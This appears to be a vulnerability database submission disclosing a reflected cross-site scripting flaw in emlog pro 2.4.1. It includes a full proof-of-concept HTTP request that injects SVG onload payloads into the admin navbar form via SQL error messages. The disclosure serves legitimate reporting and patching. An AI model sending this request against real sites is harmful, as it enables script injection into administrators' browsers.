| Title | emlog emlog pro 2.4.1 Cross-Site Scripting (XSS) |
|---|
| Description | Summary
A reflected Cross Site Scripting (XSS) vulnerability exists in emlog pro 2.4.1 due to improper sanitization of the $msg parameter in /include/lib/common.php.
Details
This vulnerability can be exploited by an attacker to inject malicious scripts into the web application, which can then be executed in the browsers of other users.
The vulnerability stems from improper filtering of SQL statement error messages in $msg.
image
POC
For example, in the /admin/navbar.php file, newtab expects data of integer type, and if it receives data of string type, it triggers an error.
The error message can contain the entire SQL statement, and a reflective XSS vulnerability can occur if the SQL statement contains any field that accepts the data passed in by the user.
In the example, the parameter naviname and url incoming fields are represented in the SQL statement.
POST /admin/navbar.php?action=add HTTP/1.1
Host: target-ip
Content-Length: 75
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: [admins'cookie]
Connection: keep-alive
naviname=<svg%20onload=alert(1)>&url=<svg%20onload=alert(2)>&pid=0&newtab=hebing123
image
ps: Of course, newtab can trigger itself. Just assign it to <svg%20onload=alert(2)> |
|---|
| Source | ⚠️ https://github.com/emlog/emlog/issues/306 |
|---|
| User | jiashenghe (UID 39445) |
|---|
| Submission | 12/13/2024 05:06 (2 years ago) |
|---|
| Moderation | 12/20/2024 13:36 (7 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 289081 [Emlog Pro up to 2.4.1 /include/lib/common.php msg cross site scripting] |
|---|
| Points | 20 |
|---|